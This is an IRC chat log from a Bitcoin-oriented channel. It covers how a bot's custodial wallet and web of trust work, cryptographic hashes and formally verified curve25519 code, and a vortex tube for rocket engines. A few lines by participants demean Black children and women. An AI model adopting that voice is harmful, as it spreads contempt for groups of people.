1797634;1523558833;mircea_popescu;well... now there is. 1797635;1523558855;*;asciilifeform has been, in person, to one of the shameful, incestuous tree-houses of the 'cryptographers' 1797636;1523558862;*;asciilifeform was memorably unimpressed. 1797637;1523558865;avgjoe;a curiosity about the deedbot wallet feature: if i use that feature, who is controlling the keys? 1797638;1523558878;mircea_popescu;asciilifeform anyway, his stance is defensible, "blake was at sha camp, just like keccak, what do you want." 1797639;1523558888;avgjoe;or at least, a server located where? 1797640;1523558890;mircea_popescu;avgjoe you ? 1797641;1523558896;mircea_popescu;or what do you mean exactly ? 1797642;1523558908;mircea_popescu;trinque is your counterparty. 1797643;1523558908;avgjoe;i supposed that was an hot wallet feature 1797644;1523558918;avgjoe;something like that 1797645;1523558929;asciilifeform;mircea_popescu: blake2 is bernstein's hash ( consists of a slightly modified chacha, his symmetric algo ) 1797646;1523558949;mircea_popescu;i know, i know. just saying, "we picked the non-chosen candidates at random, go sue." 1797647;1523558996;asciilifeform;i've no particular objection to snake oil from king cobra vs from japanese viper; but as i observed earlier, the sudden popularity of bernsteinism has never been explained to my satisfaction. 1797648;1523559008;mircea_popescu;he's popular. 1797649;1523559025;mircea_popescu;goes to their silly little "polyamory" covens on campus and frowns paternally. 1797650;1523559043;mircea_popescu;or w/e the fuck. the youth is desperate for adult figures, much like the savage kids in the us black ghetto. 1797651;1523559044;asciilifeform;wasn't so popular when he was demonstrating effective smooth integers algo 1797652;1523559051;asciilifeform;but then suddenly very very hip when crackpot symmetrics. 1797653;1523559053;mircea_popescu;wasn't meeting the above quals. 1797654;1523559059;asciilifeform;evidently 1797655;1523559081;mircea_popescu;morgan freeman is also worshipped now. why ? same reason. wolf-raised kids can't believe oldman is a thing. 1797656;1523559103;mircea_popescu;nobody cared about him back when he was a good actor 20 years ago as much as they care now, that he delivers wooden monologues of sheer nonsense. 1797657;1523559176;trinque;avgjoe: no, there is no hotwallet 1797658;1523559200;avgjoe;"Requests that `amount` be withdrawn from your available balance and sent to `to-btc-address`. This step shall be performed by a human operator after reviewing account history. Expect at least one day of processing. Bitcoin transaction fees shall be deducted from your account." 1797659;1523559202;trinque;only airgapped wallet, and human meat that cuts transactions 1797660;1523559262;avgjoe;thanks 1797661;1523559488;avgjoe;is a feature for doing off chain transactions by trusting the human meat or i'm missing something? 1797662;1523559500;mircea_popescu;https://pgp.cs.uu.nl/paths/49fc7012a5de03ae/to/8a736f0e2fb7b452.html in other news. 1797663;1523559518;mircea_popescu;avgjoe it's exactly equivalent to "segwit" except much less expensive. 1797664;1523559629;avgjoe;ok, so as long as i see trinque alive on irc i can feel safe about my test bitcents on it 1797665;1523559632;avgjoe;correct? 1797666;1523559639;mircea_popescu;just about. 1797667;1523559648;trinque;I am the operator yes. 1797668;1523559895;trinque;!!gettrust avgjoe trinque 1797669;1523559896;deedbot;L1: 0, L2: 0 by 0 connections. 1797670;1523559920;trinque;!!gettrust ben_vulpes trinque 1797671;1523559921;deedbot;L1: 4, L2: 21 by 10 connections. 1797672;1523559924;asciilifeform;trinque: refreshed daily ? 1797673;1523559931;trinque;what is? 1797674;1523559934;asciilifeform;the db 1797675;1523559944;asciilifeform;( i rated him earlier today ) 1797676;1523559973;trinque;I measured from him. 1797677;1523559979;trinque;!!gettrust trinque avgjoe 1797678;1523559979;deedbot;L1: 0, L2: 1 by 1 connections. 1797679;1523559984;asciilifeform;aaa 1797680;1523559999;asciilifeform;i had nfi this was noncommutative 1797681;1523560006;asciilifeform;but it nao makes sense 1797682;1523560007;avgjoe;why the reverse show 1 connection? 1797683;1523560018;trinque;avgjoe: the point being, while I can give you a lot of nice words about not stealing your bitcents, this doesn't amount to much. 1797684;1523560046;trinque;the web of trust, being in it and forming connections, is the proper way to answer the q 1797685;1523560088;trinque;asciilifeform: sure, maybe some guy trusts me and I think he's crazy 1797686;1523560100;asciilifeform;right 1797687;1523560114;trinque;avgjoe: http://trilema.com/2014/what-the-wot-is-for-how-it-works-and-how-to-use-it/ 1797688;1523560144;avgjoe;trinque: may I also ask, is just the wallet feature that need human presence or deedbot does other semi-auto functions? 1797689;1523560191;trinque;wot updates and all the rest are immediate 1797690;1523560201;trinque;movement of actual money (btc) is for obvious reasons, not 1797691;1523560303;trinque;anyhow avgjoe, who are you, and how'd you come by us? 1797692;1523560306;avgjoe;so if I understand correct: all the deedbot functions are ready to go for a newcomer, except for the wallet function that works well after having a good wot connection 1797693;1523560313;ben_vulpes;trinque: web site is run on a daily job? 1797694;1523560337;trinque;cron, yep. 1797695;1523560427;mircea_popescu;avgjoe you read http://trilema.com/2014/what-the-wot-is-for-how-it-works-and-how-to-use-it/ yes ? 1797696;1523560428;trinque;avgjoe: incorrect, wallet works for n00bs immediately 1797697;1523560448;mircea_popescu;o sorry, repost. 1797698;1523560452;trinque;my point was that you can't answer the question of whether to trust me as you sit there now 1797699;1523560463;trinque;well, can, but by doing it and seeing what happens. 1797700;1523560484;trinque;I am at "dog on internet" status for you 1797701;1523560526;mircea_popescu;omg, eaten log. go me! 1797702;1523560531;mircea_popescu;and bbl folks, have a great time. 1797703;1523560540;avgjoe;bye 1797704;1523560541;trinque;adios mircea_popescu 1797705;1523560574;avgjoe;i mean, ok, it works for noobs, but at the same time you don't know instantly who is managing the keys 1797706;1523560645;trinque;sure you do, search logs for "deedbot" 1797707;1523560702;ben_vulpes;trinque: dude has a point, self-referential though it might be faq.html would benefit from an "i am trinque, and have been running this service for members in good standing of the #trilema wot and others before it since XXX" 1797708;1523560794;trinque;depends on whether I think people oughta come in through existing users, or not 1797709;1523560801;trinque;wottronics says I do 1797710;1523560802;ben_vulpes;puts one miles ahead of eg localbitcoins, puts the personal aspect of trust front and center. 1797711;1523560809;avgjoe;that's would be nice, then it's up to the average joe to look up the history and wot 1797712;1523560826;trinque;someone will have to make the argument in favor of average joes 1797713;1523560843;trinque;I will at least say mircea_popescuine features come way first. 1797714;1523560864;trinque;note that a horde of titties just came through and used the thing on the basis of knowing douchebag 1797715;1523560865;ben_vulpes;hey it is your faq, you may answer as f as you like 1797716;1523560955;*;trinque is fine with putting it, so long as avgjoe here reads that WoT article. 1797717;1523560975;trinque;avgjoe: you didn't introduce yourself though. so go ahead 1797718;1523560991;avgjoe;yes, sorry 1797719;1523561004;asciilifeform;avgjoe: understand, 'looking up' tells you just about nothing if you do not have any existing trust of any of the people who wrote the item you are 'looking up' in. 1797720;1523561052;asciilifeform;avgjoe: there is no magical document that proves trustworthiness. but there is, just like thousand years ago, working with people, and developing relation with them 1797721;1523561227;avgjoe;i'm a student, I've discovered bitcoin thanks to raiblocks 1797722;1523561253;ben_vulpes;avgjoe: this is some altcoin? 1797723;1523561261;avgjoe;basically a coin that was given to lazy people that solved captchas 1797724;1523561304;ben_vulpes;what are you studying? 1797725;1523561309;avgjoe;then this coin has gained popularity for supposed scalability features that i've never investigated 1797726;1523561339;ben_vulpes;well it's more of a nineties yahooforum pink sheet stock but that's neither here nor there 1797727;1523561377;avgjoe;and a couple of months ago i was lucky to cash out in bitcoin the crazy (at least for me) amount generated by solving captchas 1797728;1523561439;ben_vulpes;what are you studying though? 1797729;1523561465;trinque;FAQ updooted 1797730;1523561477;avgjoe;after seeing that raiblocks was just some random coin, i tried to understand better bitcoin and found trilema as a very valid starting point, no-frills like, to use bitcoin in a responsable manner 1797731;1523561514;ben_vulpes;eyy trinque neato 1797732;1523561711;avgjoe;sociology 1797733;1523562043;ben_vulpes;avgjoe: studie in system oppression and advanced microagressions or what? 1797734;1523562157;avgjoe;no, it's a easy/fake study to have more spare time keeping government grants 1797735;1523562203;ben_vulpes;and what do you do with all that spare time 1797736;1523562210;avgjoe;reading trilema 1797737;1523562225;avgjoe;and the logs in these days :D 1797738;1523562268;avgjoe;and hiking 1797739;1523562294;shinohai;!!up TrixxiC 1797740;1523562295;deedbot;TrixxiC voiced for 30 minutes. 1797741;1523562370;lobbes;I was going to hop on to state this very point, but alf beat me to it so I will simply underline and point to trilema article referenced twice above. My own trust for various people (read: cryptographically backed identities) in here was not immediate, but evolved over the 4 years I've spent interfacing with said people. >> http://btcbase.org/log/2018-04-12#1797719 1797742;1523562370;a111;Logged on 2018-04-12 19:23 asciilifeform: avgjoe: understand, 'looking up' tells you just about nothing if you do not have any existing trust of any of the people who wrote the item you are 'looking up' in. 1797743;1523562436;avgjoe;thanks 1797744;1523562666;spyked;hey trinque, the front page of deedbot.org shows "Bot's address: [...] (balance {u'message': u'Method not found', u'code': -32601})" on 2nd line. looks outta the ordinary. 1797745;1523562695;trinque;blah, k 1797746;1523562697;trinque;ty 1797747;1523562725;spyked;yw :) 1797748;1523562731;*;trinque left an experimental walletless trb running on that box 1797749;1523562837;lobbes;trinque, while yer digging I noticed that wot.deedbot.org appears to have not updated in a bit (e.g. I unrated "blazedout419" a few weeks ago, yet still shows >> http://wot.deedbot.org/3320BCA7825525AD077203C331F36D29A4D93652.html) 1797750;1523562889;trinque;that I knew, but ty 1797751;1523562898;trinque;gotta figure out why the cron job keeps getting stuck. 1797752;1523563011;*;trinque just ran the same command as from cron, pretty weird 1797753;1523563105;spyked;http://btcbase.org/log/2018-04-12#1797506 <-- ain't gonna bitch about that. but just for lulz: http://archive.is/tatUF and to think, proof systems (Coq, Isabelle/HOL, etc.) exist mainly to slap humans on their wrists when they err. 1797754;1523563105;a111;Logged on 2018-04-12 17:53 mircea_popescu: http://btcbase.org/log/2018-04-12#1797053 << should be interesting once spyked wakes up lel. 1797755;1523563133;ben_vulpes;gonna spam for a sec, pls hold 1797756;1523563180;trinque;spyked: any chance you want to do mircea_popescu's requested RSS bot? I've got plenty on my plate as it stands. 1797757;1523563222;trinque;could probably pretty easily bolt your cl-feed-parser to ircbot 1797758;1523563246;ben_vulpes;!!v A8527E69320679E6A9735D12955BCA7DCD898A8A3FCBEA7FBC072778536740D4 1797759;1523563247;deedbot;ben_vulpes unrated kakobrekla. 1797760;1523563248;ben_vulpes;!!v 40DF9387B2D7D3DFD492542208C673DCF4EB12B8CD544FEA04FC749981D783A3 1797761;1523563249;deedbot;ben_vulpes updated rating of mircea_popescu from 4 to 5 << master of the realm 1797762;1523563250;ben_vulpes;!!v 59EAE7DF138654819F93FE3BDFD9CE3A7FC8C8737D5CF401E220CB446845C062 1797763;1523563251;deedbot;ben_vulpes updated rating of trinque from 4 to 6 << against every creature, living or dead 1797764;1523563252;ben_vulpes;!!v 14F938EC2F445708F8B2704A257EA91F60D111ED5D95ACC60A03616701228562 1797765;1523563253;deedbot;ben_vulpes updated rating of mod6 from 4 to 5 << foundation co-chair 1797766;1523563254;ben_vulpes;!!v D4321170EE27F031AD3EEBD41B8E1E4C532F5637D57A62D835551A93A30A3132 1797767;1523563255;deedbot;ben_vulpes updated rating of lobbes from 3 to 3 << staunch sapper 1797768;1523563263;ben_vulpes;!!v 5976F80A1F2794B3EF34F34B531D95AAC1A1EF99007F67608F86ADC5525DC2A6 1797769;1523563263;deedbot;ben_vulpes updated rating of mike_c from 3 to 1 << lost, but not forgotten 1797770;1523563264;ben_vulpes;!!v 51B9DE7561B66E6C2536CEDABC6355C499625EE1012B99831FF71C09FECB429E 1797771;1523563265;deedbot;ben_vulpes updated rating of hanbot from 2 to 4 << legendary valkyrie 1797772;1523563266;ben_vulpes;!!v EC5C8E14678916A59CF2A0AF481BD9AEA6271F301CA009DE720904DC71808096 1797773;1523563266;deedbot;ben_vulpes unrated mthreat. 1797774;1523563268;ben_vulpes;!!v 182509D378DBE6EA3EE17CF0C0E38AAAE2D682170F86A684F3318DBC7FE70CCB 1797775;1523563269;deedbot;ben_vulpes unrated rye. 1797776;1523563274;ben_vulpes;!!v 16810532F1E34865D544F57908471397D1314800FCC04AE800275D38D86C1604 1797777;1523563275;deedbot;ben_vulpes unrated ang-st. 1797778;1523563276;ben_vulpes;!!v E7073EFBA9BF9CDB7A6054E7406C45FD38E8F13504CD05F1BE0B13CA126D3DAD 1797779;1523563277;deedbot;ben_vulpes updated rating of danielpbarron from 1 to 3 << his worship 1797780;1523563278;ben_vulpes;!!v F934F5806DE35FBFB10DFD5C64BAB2CFF17A5DD75EB6DC123F65BB80D5DA16B6 1797781;1523563279;deedbot;ben_vulpes unrated princessnell. 1797782;1523563280;ben_vulpes;!!v BCBF03DA53D0411F7C81BC7367C96AF0488FFAC5FB83261C5A550C1A258C6AED 1797783;1523563281;deedbot;ben_vulpes unrated smickles. 1797784;1523563282;ben_vulpes;!!v D99F7B29DD8BC742D50988B5155A3D265BBF5AED29CC8089ED2940DE526BD257 1797785;1523563283;deedbot;ben_vulpes unrated solrodar. 1797786;1523563287;ben_vulpes;!!v 1BFCF592050AC7F1172BAC82BF491D0462E8E274488A67430FDB9FE12C38BB9D 1797787;1523563288;deedbot;ben_vulpes unrated vvande. 1797788;1523563289;ben_vulpes;!!v 761EDFB41C3704005996B2D3A97F68375DDC6F440301B64E9F10DC5C3F82175D 1797789;1523563290;deedbot;ben_vulpes unrated xmj. 1797790;1523563291;ben_vulpes;!!v 23F54062DF2992D7F763DA177DA54B1C8E535E6D170F8E55EC2E8FE4AC22E01D 1797791;1523563291;deedbot;ben_vulpes unrated agustin. 1797792;1523563299;ben_vulpes;beg pardon, that's done 1797793;1523563357;*;ben_vulpes to ice hands 1797794;1523563463;spyked;trinque, yeah, I'm actually playing with cl-feed-parser to get an idea of what's required for the feed bot, going to spec it and all. I grabbed it off the githubs ( https://github.com/tkych/cl-feed-parser ) and the number of dependencies is irksome, so if you happen to know a better alternative other than building my own, I'm open to suggestions 1797795;1523563487;trinque;nope, current thing is a sad pythonball hanging off the side. 1797796;1523563635;spyked;okay then, I'm gonna work it off this. it'd be enough to replace the "drakma" http client with something lighter, and I'd already cut about half of it. the dependency tree leads to two xml parser libraries being used (plus other redundant stuff). 1797797;1523563695;spyked;whole thing's a mess, but I'm organizing the code so that I can eventually replace it with something else. 1797798;1523563801;trinque;a muntzed drakma would be a fine thing, I'd sign 1797799;1523564202;spyked;anyway, back to http://btcbase.org/log/2018-04-12#1797753 : also, I ran a http://p.bvulpes.com/pastes/hYZVy/?raw=true out of curiosity. results: cca 150k LoC of proof (of which ~10k just the basic definitions) that generate another cca 100k LoC of C code. but to be fair, this is for more than just 25519 1797800;1523564202;a111;Logged on 2018-04-12 19:58 spyked: http://btcbase.org/log/2018-04-12#1797506 <-- ain't gonna bitch about that. but just for lulz: http://archive.is/tatUF and to think, proof systems (Coq, Isabelle/HOL, etc.) exist mainly to slap humans on their wrists when they err. 1797801;1523564430;spyked;zx2c4, I've been looking over the tamarin protocol verification paper and I'm curious, what does "symbolic verification" mean? also, what's the thing's output? is it just a "yes, properties hold" or does it also output the proof? 1797802;1523564680;spyked;more to the point, this is similar to asciilifeform's "auditability" question. is there a way to obtain a (ideally human-readable) set of deductions out of the prover? 1797803;1523566120;asciilifeform;spyked: if you recall, back in the 'minsky age', that was the initial attraction of mechanical 'reasoners' -- discovery of ~simple~ inferences 1797804;1523566133;asciilifeform;unfortunately it never went far beyond 'rediscovered pythagor's theorem' 1797805;1523566148;asciilifeform;but this was enuff for the tech to find its way to the cargocultists. 1797806;1523566197;asciilifeform;http://btcbase.org/log/2018-04-12#1797798 << 1 of the things on asciilifeform's 'wish list', is a reasonable ada http serv 1797807;1523566197;a111;Logged on 2018-04-12 20:10 trinque: a muntzed drakma would be a fine thing, I'd sign 1797808;1523566230;asciilifeform;( somewhere along the lines of http://btcbase.org/log/2018-02-02#1780200 thread ) 1797809;1523566230;a111;Logged on 2018-02-02 22:32 asciilifeform: idea is a http server in <1000 ln of ada, approx. 1797810;1523566265;asciilifeform;'reasonable' meaning, on top of mere compactness, other fine things like heaplessness 1797811;1523566373;asciilifeform;http://btcbase.org/log/2018-04-12#1797799 << if this looks monstrous, prepare to barf when you consider how much the ~verifier~ weighs 1797812;1523566373;a111;Logged on 2018-04-12 20:16 spyked: anyway, back to http://btcbase.org/log/2018-04-12#1797753 : also, I ran a http://p.bvulpes.com/pastes/hYZVy/?raw=true out of curiosity. results: cca 150k LoC of proof (of which ~10k just the basic definitions) that generate another cca 100k LoC of C code. but to be fair, this is for more than just 25519 1797813;1523566398;asciilifeform;( and i dun think i need to explain that the mecha-proof is ~meaningless~ without reading the claimed verifier ) 1797814;1523566533;asciilifeform;spyked: in re proof machines, i'm much moar interested in items like ACL2 , where you can affix your hand-written program to a hand-written proof of correctness in a mechanically-reliable way 1797815;1523566549;asciilifeform;ada's spark is a similar, if somewhat uglier/bulkier, thing 1797816;1523566600;asciilifeform;in any case fits-in-head MUST come ahead of 'proofiness'. 1797817;1523566660;asciilifeform;!#s acl2 1797818;1523566661;a111;7 results for "acl2", http://btcbase.org/log-search?q=acl2 1797819;1523566667;asciilifeform;^ possibly thread. 1797820;1523567218;asciilifeform;ben_vulpes: http://btcbase.org/log/2018-04-12#1796970 << here's a thing i wondered about for many yrs : is there any reason why a wirbelrohr could not do the job of 'frost control' in an 'airbreather rocket' ? 1797821;1523567218;a111;Logged on 2018-04-12 07:30 ben_vulpes: 2015, btw, aviationweek http://aviationweek.com/space/reaction-engines-reveals-secret-sabre-frost-control-technology 1797822;1523567277;asciilifeform;ben_vulpes: gives you clean, h2o-free o2, if the spigot is placed correctly in the vortex, as i understand 1797823;1523567335;asciilifeform;also gives you cooling, reasonably cheaply 1797824;1523567378;ben_vulpes;my first q is what is the breadth of intake gas velocities and fluxes that such a device could handle 1797825;1523567414;asciilifeform;as i understand, would be constrained by possible length of the tube and the strength of the material from which it is made 1797826;1523567457;asciilifeform;( as well as the fact that it has to work 'from parking lot to mach X' ) 1797827;1523567490;ben_vulpes;interesting 1797828;1523567609;ben_vulpes;won't work past mach 1797829;1523567622;ben_vulpes;refrigeration depends on compressibility of the working fluid 1797830;1523567634;asciilifeform;must point out, i haven't the faintest reason to think that it would work; was specifically curious re whynot 1797831;1523567699;asciilifeform;ben_vulpes: iirc wirbelrohr works just the same on liquids 1797832;1523567727;asciilifeform;for so long as you can make a pressure gradient at all. 1797833;1523567752;asciilifeform;( if you cannot, you have a solid, and naturally no it won't work on a solid, lol ) 1797834;1523567773;ben_vulpes;just cribbing from wikipedia here, but "there is no longer cooling observed since cooling requires compressibility of the working fluid" 1797835;1523567784;asciilifeform;( though i suspect something like it would even work in a 'springy' solid. see 'phonons' etc ) 1797836;1523567877;ben_vulpes;it'll cool, sure, but nowhere near as much as if it were a gas, as the gas will condense and pull further heat out of the local system. 1797837;1523567883;ben_vulpes;not condense, but compress. 1797838;1523567940;asciilifeform;ben_vulpes: colour me thick, but how does the compression of oncoming gas ~pull out~ heat ? consider how 'reentry heat' comes about. 1797839;1523567965;asciilifeform;meteorite does not burn from friction of atmosphere, but specifically from compressing oncoming air 1797840;1523567977;asciilifeform;think 'diesel' 1797841;1523567978;ben_vulpes;nono color me thick 1797842;1523568036;ben_vulpes;there is an expander in the diagram, had a sign error 1797843;1523568069;ben_vulpes;https://aip.scitation.org/doi/10.1063/1.1740893 1797844;1523568085;ben_vulpes;"The Use of the Expansion of Gases in a Centrifugal Field as Cooling Process" 1797845;1523568104;asciilifeform;btw ben_vulpes probably has held in his hands, the tube : they are often found in machine shops 1797846;1523568110;asciilifeform;spot-cooling for milling process 1797847;1523568122;asciilifeform;intake of 'whistle' goes to the house air hose 1797848;1523568126;ben_vulpes;might work if you had enough expander and volume to slow the intake down and get it out of the incompressible regime 1797849;1523568133;asciilifeform;cold-end -- points down at $workpiece 1797850;1523568155;ben_vulpes;asciilifeform: yeah here and there, more frequently we simply flooded the workpiece with coolant. 1797851;1523568180;asciilifeform;ben_vulpes: you'd want prolly something like the 'mouth' of mig-15 1797852;1523568220;ben_vulpes;could make a good intercooler for garage flugenthingers 1797853;1523568245;ben_vulpes;or hm 1797854;1523568283;asciilifeform;ben_vulpes: don't fixate on the cooling ; i proposed it as simple means of producing 'dry' air 1797855;1523568294;asciilifeform;cooling -- bonus. 1797856;1523568319;ben_vulpes;heh well then you gotta cool the dryer, dontcha 1797857;1523568352;asciilifeform;nope 1797858;1523568380;asciilifeform;consider what happens in the vortex. center tap gives you 'cold end', which contains the heavier objects, incl. water 1797859;1523568393;asciilifeform;outer tap -- 'hot' -- is dry air 1797860;1523568427;asciilifeform;colour me again thick, why does the dry air require cooling ? esp if your intended use for it is rocket oxidizer 1797861;1523568437;asciilifeform;why not pipe it straight to the chamber. 1797862;1523568459;ben_vulpes;you'll want to compress it somewhat for reasons of efficiency; consider again the diesel and its turbo 1797863;1523568485;asciilifeform;the motion of the rocket ( align the tube with the motion axis, naturally ) does this for you, neh 1797864;1523568548;ben_vulpes;not on the tarmac 1797865;1523568560;ben_vulpes;this is the ramjet 1797866;1523568561;*;asciilifeform does not harbour any illusions that this is 'easy pill' -- think, e.g. korolev would have had this pill, if it were so easy. but curious re the prohibitive boojum specifically. 1797867;1523568566;asciilifeform;ben_vulpes: roughly 1797868;1523568570;jurov;i think the vortex sorts particles by momentum, not necessarily by temperature 1797869;1523568584;ben_vulpes;hellish inferno of combustion chamber is at very high pressures in engineered rocket engine. 1797870;1523568597;asciilifeform;jurov: naturally not 'by temperature' purely, or you would have 'maxwell's daemon' lol 1797871;1523568633;jurov;but i don't know if same temperature means h2o and o2 molecules have same momentum? or they have same kkinetic energy? 1797872;1523568648;ben_vulpes;jurov: it's alll the same thiiiiing 1797873;1523568724;ben_vulpes;you get some gases that speed up, pulling energy out of the gases that slow down which dump energy into the higher speed gases. not purely a 'sorter'. 1797874;1523568867;jurov;you want it to separate water, no? 1797875;1523569031;ben_vulpes;i think it puts the water in the wrong place. you get dry, hot air which you'd then have to cool and compress into the engine and cold wet air (possibly with the water condensed out entirely with a spigot) 1797876;1523569057;asciilifeform;ben_vulpes: there is of course another way to get dry air 1797877;1523569077;asciilifeform;above certain temp, water cannot exist, only h2, o2 1797878;1523569106;ben_vulpes;heh ah ha 1797879;1523569127;asciilifeform;whether it is possible to create this condition mechanically, purely from result of vehicle's motion -- i do not know 1797880;1523569133;ben_vulpes;"i know, let's premix our fuel and oxidizer!" 1797881;1523569144;asciilifeform;probably a simple calculation would tell us 'nope'. and if al schwartz were here, he might deign to post it 1797882;1523569146;ben_vulpes;this gets tried once a generation 1797883;1523569147;asciilifeform;but he aint here. 1797884;1523569158;asciilifeform;and nope, not premix, lol 1797885;1523569163;asciilifeform;'bang gas' or what's it in engl. 1797886;1523569191;ben_vulpes;hypergolic? 1797887;1523569203;ben_vulpes;anyways i have a girthy sql to wrestle and http://logs.bvulpes.com/trilema?d=2018-3-23#317862 1797888;1523569203;mimisbrunnr;Logged on 2018-03-23 04:08 douchebag: Okay, why do you guys liek arguing so much? Is this why you guys don't get anything done? 1797889;1523569207;asciilifeform;neh that's not 'premixed in the tank' lol 1797890;1523569215;asciilifeform;that's mixed in nozzle. 1797891;1523569227;asciilifeform;but aite. 1797892;1523569228;ben_vulpes;bang gas is then a pressure-drop triggered combustion? 1797893;1523569245;ben_vulpes;yeah i can't this thread anymore, too damn seductive. 1797894;1523569387;spyked;http://btcbase.org/log/2018-04-12#1797811 <-- been there. and the kernel is not monstrous (paper: http://www.cs.ru.nl/~freek/courses/tt-2012/papers/sadhana.pdf -- funfact: a bastard version of mccarthy's "maxwell equations" lies buried somewhere in there), but attempting to use it to solve even simple problems from 7th grade mathbook can lead to huge codebase. and will inevitably bring the computer-aided mathematician to an existential 1797895;1523569387;a111;Logged on 2018-04-12 20:52 asciilifeform: http://btcbase.org/log/2018-04-12#1797799 << if this looks monstrous, prepare to barf when you consider how much the ~verifier~ weighs 1797896;1523569393;spyked;crisis. 1797897;1523569423;asciilifeform;spyked: sorta how it is ~impossible to write a prolog proggy without several times ending up asking machine np-hard question. 1797898;1523569498;asciilifeform;spyked: i dun have anything against mechanical proof per se; but it is NOT a substitute for fits-in-head, because there is nor cannot be any such substitute. and the mass of the theorem-verifier is to be included with the mass of the program, for the purpose of 'is this head-fittable'. but possibly i repeat old thread. 1797899;1523569698;deedbot;http://qntra.net/2018/04/wwiii-continues-waiting/ << Qntra - WWIII Continues Waiting 1797900;1523570267;spyked;http://btcbase.org/log/2018-04-12#1797815 <-- must confess that I am eager to read FFA spark. 1797901;1523570267;a111;Logged on 2018-04-12 20:55 asciilifeform: ada's spark is a similar, if somewhat uglier/bulkier, thing 1797902;1523570351;asciilifeform;spyked: it'll happen. tho i am aiming for folx to end up answering 'this did not need sparkism, it is evidently correct to naked eyes' 1797903;1523570802;asciilifeform;!!up saturn_ 1797904;1523570803;deedbot;saturn_ voiced for 30 minutes. 1797905;1523570811;saturn_;heyyy 1797906;1523570826;saturn_;i did not get my bitcoins yet xc 1797907;1523570850;asciilifeform;^ trinque ? 1797908;1523570880;asciilifeform;saturn_: iirc he processes withdrawals nightly 1797909;1523570909;saturn_;okidokie cx 1797910;1523572019;trinque;saturn_: http://btcbase.org/log/2018-04-12#1796948 1797911;1523572019;a111;Logged on 2018-04-12 07:03 trinque will get to these tomorrow, girls 1797912;1523572092;saturn_;ty!!!! 1797913;1523577532;douchebag;alright bois 1797914;1523577539;douchebag;crackin a cold 1 1797915;1523580144;zx2c4;mircea_popescu: asciilifeform: http://btcbase.org/log/2018-04-12#1797528 http://btcbase.org/log/2018-04-12#1797506 -- in case you're interested in the ecc stuff more, the formally verified fiat and hacl implementations are not the only ones we have. we also have constant time accelerated x86 adx and bmi2 implementations https://git.zx2c4.com/WireGuard/tree/src/crypto/curve25519-x86_64.h and also constant time accelerated arm neon implementations 1797916;1523580144;a111;Logged on 2018-04-12 18:00 asciilifeform: it resembles 'nano ecc' which at 1 point asciilifeform tried to port to trb 1797917;1523580144;a111;Logged on 2018-04-12 17:53 mircea_popescu: http://btcbase.org/log/2018-04-12#1797053 << should be interesting once spyked wakes up lel. 1797918;1523580144;zx2c4;https://git.zx2c4.com/WireGuard/tree/src/crypto/curve25519-arm.S 1797919;1523580144;zx2c4;mircea_popescu: http://btcbase.org/log/2018-04-12#1797532 why stronger than i realize? 1797920;1523580144;a111;Logged on 2018-04-12 18:06 mircea_popescu: http://btcbase.org/log/2018-04-12#1797132 << this counterstructure argument is actually quite strong ; may indeed be stronger than the proponent realizes. 1797921;1523580144;zx2c4;asciilifeform: http://btcbase.org/log/2018-04-12#1797596 obviously aes has quite a bit of structure too, but there's a difference 1797922;1523580144;a111;Logged on 2018-04-12 18:35 asciilifeform: http://btcbase.org/log/2018-04-12#1797532 << as far as i can tell the 'rsa has structure! but aes, surely not' is instance of minsky's empty room ( http://btcbase.org/log/2014-11-13#920444 ) 1797923;1523580144;zx2c4;asciilifeform: http://btcbase.org/log/2018-04-12#1797645 it's based on chacha but was actually developed by aumasson and co 1797924;1523580144;a111;Logged on 2018-04-12 18:48 asciilifeform: mircea_popescu: blake2 is bernstein's hash ( consists of a slightly modified chacha, his symmetric algo ) 1797925;1523580144;zx2c4;spyked: http://btcbase.org/log/2018-04-12#1797801 tamarin (and cryptoverif and proverif) spit out the proof too. tamarin has a nice mode that will draw diagrams and flow charts too to make it easier to digest the proofs. people even have scripts to convert the output into latex in case you want an academic paper for free... 1797926;1523580144;a111;Logged on 2018-04-12 20:20 spyked: zx2c4, I've been looking over the tamarin protocol verification paper and I'm curious, what does "symbolic verification" mean? also, what's the thing's output? is it just a "yes, properties hold" or does it also output the proof? 1797927;1523584362;lobbes;been thinking through tickerbot design, and seems like the sane thing would be to have Process A (which is an instance of logbot-genesis with "logbot-multiple-channels-corrected" patch) running that makes changes to a postgresql database. 1797928;1523584370;lobbes;Then I have Process B that is triggered on changes to that database doing the various "market price" retrieval and volume averaging. Process B inserts retrieved data into database and Process A responds accordingly 1797929;1523584988;lobbes;technical design aside though, there's still that obvious fact that we have to rely on various $mtgoxes for market price :/ Though I'm not sure what be a better source for a fiat-btc exchange rate (iirc this was a mini-thread somewhere in logs) 1797930;1523585180;trinque;kittycollector and sashahsas, you used the same address. someone is lazy. 1797931;1523585542;mircea_popescu;lmao 1797932;1523585550;mircea_popescu;!!up TrixxC 1797933;1523585551;deedbot;TrixxC voiced for 30 minutes. 1797934;1523585626;mircea_popescu;zx2c4 specifically for the "empty room" problem he brought up. do you follow the logic there ? 1797935;1523585857;mircea_popescu;http://btcbase.org/log/2018-04-12#1797734 << hey. he has a point there, if you're gonna bilk it gotta bilk it. 1797936;1523585857;a111;Logged on 2018-04-12 19:42 avgjoe: no, it's a easy/fake study to have more spare time keeping government grants 1797937;1523585982;mircea_popescu;http://btcbase.org/log/2018-04-12#1797781 << aww, dese women in tech. 1797938;1523585982;a111;Logged on 2018-04-12 20:01 deedbot: ben_vulpes unrated princessnell. 1797939;1523586012;mircea_popescu;btw, does it occur to anyone else that #trilema is way ahead of i dunno, black-chicks-code or whatever other imperial nonsense in terms of both headcount, volume or value of female participation in techgeneering ? 1797940;1523586142;mircea_popescu;http://btcbase.org/log/2018-04-12#1797803 << very much recall ; http://btcbase.org/log/2014-02-26#532413 1797941;1523586142;a111;Logged on 2018-04-12 20:48 asciilifeform: spyked: if you recall, back in the 'minsky age', that was the initial attraction of mechanical 'reasoners' -- discovery of ~simple~ inferences 1797942;1523586142;a111;Logged on 2014-02-26 14:52 mircea_popescu: they let it run overnight, among the conclusions it had arrived to by morning was "napoleon had an infinite number of arms" 1797943;1523586211;mircea_popescu;http://btcbase.org/log/2018-04-12#1797814 << this'd be the one extra item vtronics might eventually get, if this ever comes to exist in a proper sense. 1797944;1523586211;a111;Logged on 2018-04-12 20:55 asciilifeform: spyked: in re proof machines, i'm much moar interested in items like ACL2 , where you can affix your hand-written program to a hand-written proof of correctness in a mechanically-reliable way 1797945;1523586399;mircea_popescu;http://btcbase.org/log/2018-04-12#1797868 << quite ; but this is not unrelated, mommentum = mv. and v has a T component. 1797946;1523586399;a111;Logged on 2018-04-12 21:29 jurov: i think the vortex sorts particles by momentum, not necessarily by temperature 